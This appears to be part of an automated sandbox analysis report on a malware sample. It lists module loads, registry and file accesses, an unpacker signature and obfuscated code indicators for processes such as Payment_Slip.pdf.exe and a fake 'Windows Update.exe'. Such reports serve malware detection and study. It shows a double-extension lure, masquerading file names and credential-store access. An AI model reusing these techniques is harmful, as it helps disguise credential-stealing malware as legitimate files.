Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\host.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: pstorec.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe	Section loaded: edputil.dll

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

File opened: C:\Users\user\Desktop\Payment_Slip.pdf.cfg

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Roaming\host.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Payment_Slip.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Payment_Slip.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkYyY8ejXRydhTtm3i.cs

.Net Code: mxE3KDYg98 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe

Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

11_2_0041A8DA

Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004000D8 push es; iretd	11_2_004000D9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0040008C push es; iretd	11_2_0040008D
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_004542E6 push ecx; ret	11_2_004542F9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_0045B4FD push esi; ret	11_2_0045B506
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00432BD6 push ecx; ret	11_2_00432BE9
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe	Code function: 11_2_00454C08 push eax; ret	11_2_00454C26
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D3DF0 push esi; retn 0006h	12_2_007D3F6A
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D40F9 push edi; retn 0006h	12_2_007D40FA
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D5168 pushad ; retn 0006h	12_2_007D516A
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D3D41 push ebp; retn 0006h	12_2_007D3D42
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D3DE1 push esi; retn 0006h	12_2_007D3DE2
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D3D81 push ebp; retn 0006h	12_2_007D3D82
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_007D3E78 push esi; retn 0006h	12_2_007D3E7A
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_067FB943 push es; ret	12_2_067FB950
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_068377B4 push es; ret	12_2_068377C0
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_068377DC push es; ret	12_2_068377C0
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C35348 push edi; ret	12_2_06C35702
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C3CF20 push 9806C22Ah; retf	12_2_06C3CF25
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C3B248 push ss; retn 0006h	12_2_06C3B24A
Source: C:\Users\user\AppData\Roaming\host.exe	Code function: 12_2_06C3A3A8 push cs; retn 0006h	12_2_06C3A3AA
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_05B28BEF push edi; retn 0000h	13_2_05B28BF1
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_0682F7D8 push eax; retn 0683h	13_2_0682F999
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06827638 push esp; ret	13_2_06827685
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06824085 push 8B000003h; iretd	13_2_0682408C
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A9BE78 push eax; ret	13_2_06A9BE79
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A90B33 push eax; iretd	13_2_06A90B39
Source: C:\Users\user\AppData\Local\Temp\conserver.exe	Code function: 13_2_06A948E1 push 7806AC64h; ret	13_2_06A948ED
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044693D push ecx; ret	14_2_0044694D
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044DB70 push eax; ret	14_2_0044DB84
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_0044DB70 push eax; ret	14_2_0044DBAC
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe	Code function: 14_2_00451D54 push eax; ret	14_2_00451D61

Source: Payment_Slip.pdf.exe	Static PE information: section name: .text entropy: 7.92864214342551
Source: mHTmhPhJy.exe.0.dr	Static PE information: section name: .text entropy: 7.92864214342551

Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, y6YcC1IOBotyQaRh6iv.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UGqmJ8MBqD', 'wN4mQBplev', 'eibmxS6tNg', 'nEbmY9m5u9', 'cKpm1IjB4r', 'fvfmM2w59Q', 'kUWmFBbCUp'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, TkUSwEDOYAt7lMcOwY.cs	High entropy of concatenated method names: 'NRA8pUUdsa', 'Aw68vN7LDN', 'KDM8neba9o', 'xeT8Dtl9Y1', 'UX687G7tUB', 'LsP85USCFS', 'OdF8gj36Yo', 'bOr8G9JObC', 'u278RGPWqT', 'A2j8mY130i'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, yKfW5T3tGnC6kmUxYP.cs	High entropy of concatenated method names: 'XkvIj6t4op', 'bAoIe1Qtrx', 'COYITAt7lM', 'eOwIVYkAlm', 'IEFI7Ru15P', 'pZ5I5j5SaK', 'hdjSCBE87qxDviTt4R', 'x8QjfLcT4dJ3jgHCOK', 'hOkIIP0PWs', 'vHsIyAx3kT'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, KRVs7iYj6yPbNKa0Yl.cs	High entropy of concatenated method names: 'rvC7bRxxO5', 'aYm7QEVGFS', 'oZU7YqDDGA', 'De3713rDtB', 'hFK7oLwpSy', 'jNY7UqLH7i', 'uyG7Bbiq90', 'dlx7sFbbJD', 'irp7iO4JBc', 'cR47AM11Ke'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, tqpMvgxuTt3IAmVCrg.cs	High entropy of concatenated method names: 'mdfZnqQ9eo', 'r4nZDfEQbn', 'NM2Z0jxft6', 'MQqZoCJ597', 'FXVZBCOn8D', 'GwAZsP1aKJ', 'zvuZA8rWfc', 'XaWZSqqNGP', 'GAPZbYdVwt', 'KfZZJkRVHi'
Source: 0.2.Payment_Slip.pdf.exe.8250000.6.raw.unpack, Gk9PdaMAVGGLVrsCuI.cs	High entropy of concatenated method names: 'ToString', 'GBx5J3M3FH', 'y4g5ojIYbK', 'pOZ5Ue8nt0', 'ojx5BVZ8nf', 'mRe5sMisqQ', 'lip5iIkXTo', 'A9f5A3HKdF', 'IkI5S0Mn86', 'Rqd5HDRLNk'
